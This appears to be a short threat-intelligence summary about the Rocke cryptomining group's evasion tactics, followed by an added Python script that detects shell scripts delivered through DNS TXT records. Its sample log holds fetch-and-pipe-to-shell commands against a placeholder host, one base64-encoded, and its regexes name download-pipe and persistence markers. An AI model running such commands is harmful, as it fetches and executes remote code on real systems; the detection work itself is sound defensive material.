What is the problem?
Researchers have observed that the Chinese cryptomining threat actor group Rocke has changed its tactics, techniques, and procedures (TTPs) to evade detection.
What do we know about the group?
Rocke is a threat actor group that primarily focuses on cryptocurrency mining on compromised machines. This threat group was first spotted by researchers from Cisco Talos in August 2018. This group is known for using malware written in Go.
Rocke has made new updates to its tactics, which include:
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” researchers noted.
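The shift described above, from Pastebin-hosted scripts to self-hosted files and DNS records, changes what a defender should watch for: DNS TXT answers that carry shell-script content instead of the usual SPF, DMARC or verification strings. The following detection sketch is an added example written for this page; it is not code from the article or from the researchers it quotes. The log line format, the `placeholder.test` domains and the sample records are all constructed for the example, and the indicator patterns are a starting point rather than a vetted rule set.

```python
"""
Added example: flag DNS TXT answers that look like script delivery.

The key=value log format and every domain/answer below are constructed
for illustration; adapt parse_dns_log_line() to a real resolver's format.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed: a short script, base64-encoded at import time so the sample
# below exercises the decode path without a hand-typed base64 string.
_ENCODED_SCRIPT = base64.b64encode(
    b"#!/bin/sh\nwget -q -O- http://placeholder.test/y.sh | sh"
).decode("ascii")

# Constructed sample log lines (one DNS answer per line).
SAMPLE_LOG = [
    '2024-01-01T10:00:01Z client=10.0.0.5 qname=example.test qtype=TXT rcode=NOERROR '
    'answer="v=spf1 include:_spf.example.test -all"',
    '2024-01-01T10:00:02Z client=10.0.0.5 qname=_dmarc.example.test qtype=TXT rcode=NOERROR '
    'answer="v=DMARC1; p=reject; rua=mailto:dmarc@example.test"',
    '2024-01-01T10:00:03Z client=10.0.0.9 qname=cfg.c2-placeholder.test qtype=TXT rcode=NOERROR '
    'answer="#!/bin/sh; curl -fsSL http://placeholder.test/x.sh | sh"',
    '2024-01-01T10:00:04Z client=10.0.0.9 qname=cfg2.c2-placeholder.test qtype=TXT rcode=NOERROR '
    f'answer="{_ENCODED_SCRIPT}"',
    '2024-01-01T10:00:05Z client=10.0.0.7 qname=example.test qtype=A rcode=NOERROR '
    'answer="192.0.2.10"',
]

_LINE_RE = re.compile(
    r'^(?P<ts>\S+) client=(?P<client>\S+) qname=(?P<qname>\S+) '
    r'qtype=(?P<qtype>\S+) rcode=(?P<rcode>\S+) answer="(?P<answer>.*)"$'
)

# Named indicators of script content in a TXT payload (plain or decoded).
SCRIPT_MARKERS = [
    ("shebang", re.compile(r"^#!/")),
    ("download-pipe", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("shell-path", re.compile(r"/bin/(ba)?sh\b|\bchmod\s+\+x\b|\bnohup\b|\bcrontab\b")),
]


def parse_dns_log_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one constructed-format log line into a dict, or None if malformed."""
    m = _LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_if_base64(payload: str) -> Optional[str]:
    """Return the UTF-8 text of a base64 payload, or None if it is not one."""
    token = payload.strip()
    if len(token) < 16 or not re.fullmatch(r"[A-Za-z0-9+/=]+", token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def script_indicators(answer: str) -> List[str]:
    """List 'plain:<marker>' / 'base64:<marker>' hits for a TXT answer.

    Ordinary records (SPF, DMARC, DKIM, verification tokens) are not
    whitelisted on purpose: a benign-looking prefix is cheap to forge, so
    every answer is checked the same way.
    """
    candidates = [("plain", answer)]
    decoded = decode_if_base64(answer)
    if decoded is not None:
        candidates.append(("base64", decoded))
    reasons = []
    for label, text in candidates:
        for name, pattern in SCRIPT_MARKERS:
            if pattern.search(text):
                reasons.append(f"{label}:{name}")
    return reasons


def find_suspicious(lines: List[str]) -> List[Dict[str, object]]:
    """Return TXT answers that carry script indicators, with client and name."""
    hits = []
    for line in lines:
        rec = parse_dns_log_line(line)
        if rec is None or rec["qtype"] != "TXT":
            continue
        reasons = script_indicators(rec["answer"])
        if reasons:
            hits.append({"client": rec["client"], "qname": rec["qname"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['qname']}: {', '.join(hit['reasons'])}")
```

Run against the constructed log, the two `c2-placeholder.test` records are reported (one plain, one after base64 decoding) while the SPF, DMARC and A-record lines pass. In production the same logic belongs in the resolver or passive-DNS pipeline, where a second useful signal is the pairing of an unusual TXT lookup with an outbound fetch from the same host shortly afterwards.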